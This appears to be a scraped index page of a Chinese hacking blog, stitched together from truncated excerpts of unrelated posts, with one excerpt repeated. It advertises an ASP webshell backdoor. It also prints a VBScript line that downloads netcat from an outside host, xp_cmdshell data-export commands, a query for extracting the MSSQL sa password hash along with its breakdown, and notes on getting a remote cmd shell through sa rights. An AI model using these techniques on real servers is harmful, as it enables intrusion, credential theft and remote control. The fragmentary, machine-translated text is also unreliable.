心动吧黑客BLOG

 这一个文章和我以前发布的一个文章正好成了一个对比（文章连接），如果上一次是茅。那么此次这个就是盾了.为什么这样说？请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图：

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

首先说明一点，这个方法很早就有了，不过用时大概在脑袋里沉寂太久，已经处于忘却状态。感谢Trace提供资料。

经常会遇到任意文件下载漏洞,一般处理的方法是把数据库连接文件下载回来,然后远程连接上去。最理想的状态莫过于MSSQL和MYSQL，尤其是在数据库 和WEB不分离的情况下，备分SHELL，导出SHELL，可以用的方法很多。不过要是数据库和WEB分离，而且数据库在内网不可上网，或者有防火墙等等 其他手段使得我们无法连上远程数据库时，不妨假设的再艰难一些，甚至无法找到一个mssql注射点时，很多情况下通常会束手无策。

这里以 MSSQL为例子，很凑巧找到一个任意文件下载漏洞，直接下了WEB.CONFIG回来看，发现数据库在内网，找了半天没找到注射点，稍微旁注一下，有一 个站，可惜是ACCESS数据库。猜不到表和后台。不过目标站的后台是知道的，然后准备从这个access注射点读出目标站管理员帐户。直观一些，下面直 接给出我本地测试结果:

......

Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://www.kanwi.cn/nc.zip",0  xPost.Send() 

/*******  导出到excel
EXEC master..xp_cmdshell ’bcp SettleDB.dbo.shanghu out c:\temp1.xls -c -q -S"GNETDATA/GNETDATA" -U"sa" -P""’

/***********  导入Excel
SELECT *
FROM OpenDataSource( ’Microsoft.Jet.OLEDB.4.0’,
  ’Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0’)...xactions

SELECT cast(cast

....

mysql>select aid,group_concat(bid) from tbl group by aid limit 1;

sql语句比较简单，按照aid分组，并且把相应的bid用逗号串起来。这样的句子大家可能都用过，也可能不会出问题，但是如果bid非常多的话，你就要小心了，比如下面的提示信息：

Query OK, XXX rows affected, 1 warning (3 min 45.12 sec)

怎么会有警告呢，打出来看看：

....

Author: kook1991

得到客户端主机名:
select host_name();

得到服务端主机名:

....

明生注：利用sa权限返回一个cmd执行权限..这样就可以为所欲为了。。哈哈（别干坏事...知道方法就塞住他免得被人入侵）。

然后通过SA Exploiter and Windows Bind Shell 进行入侵 反弹一个cmd回来

转自:TR博客

The most advanced GUI tool for aiding in full compromises of MSSQL servers via SQL injection.
Author: Scott White, Senior Security Consultant

Release:  August 10, 2008 by SecureState, 2pm at Defcon 16, Las Vegas, NV
 

...

#Trace: Sid总结的。补充的在留言里贴吧。

SQL Server 2000:-

SELECT password from master.dbo.sysxlogins where name='sa' 

0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341

2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0×0100- constant header

34767D5C- salt

0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash

2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash

....

SQL服务器是怎样储存密码的？

SQL服务器使用了一个没有公开的函数pwdencrypt()对用户密码产生一个hash。通过研究我们可以发

现这个hash储存在mater数据库的sysxlogins表里面。这个可能已经是众所周知的事情了。

pwdencrypt()函数还没有公布详细的资料，我们这份文档将详

...

有兴趣看的人丢给谷哥翻译

只是一般资讯..数据库的应用程序存储数据的收集。提供各种数据库的API ，用于创建，访问和管理它的数据。和数据库（ DB ）的服务器可与我们的网络发展，使我们能够拿起东西我们希望从数据库中没有太多的困难。数据库可举行各种重要的信息像用户名，密码，信用卡关心等因此，数据库需要担保，但许多数据库服务器运行的insecured或者bcoz他们的脆弱性或bcoz贫困的编程处理。命名几个数据库服务器， MySQL的（开放源码） ，数据库，质谱，交通，甲骨文， Postgre数据库（开放源码） ，的SQLite等



什么是SQL注入

SQL注入可能是最丰富的编程漏洞，存在于互联网上本。它是通过它的脆弱性未经授权的人可以访问各种关键和私人数据。 SQL注入是不

....

作者:皇子

首先说明一点，这个方法很早就有了，不过用时大概在脑袋里沉寂太久，已经处于忘却状态。感谢Trace提供资料。

经常会遇到任意文件下载漏洞,一般处理的方法是把数据库连接文件下载回来,然后远程连接上去。最理想的状态莫过于MSSQL和MYSQL，尤其是在数据库 和WEB不分离的情况下，备分SHELL，导出SHELL，可以用的方法很多。不过要是数据库和WEB分离，而且数据库在内网不可上网，或者有防火墙等等 其他手段使得我们无法连上远程数据库时，不妨假设的再艰难一些，甚至无法找到一个mssql注射点时，很多情况下通常会束手无策。

这里以 MSSQL为例子，很凑巧找到一个任意文件下载漏洞，直接下了WEB.CONFIG回来看，发现数据库在内网

.......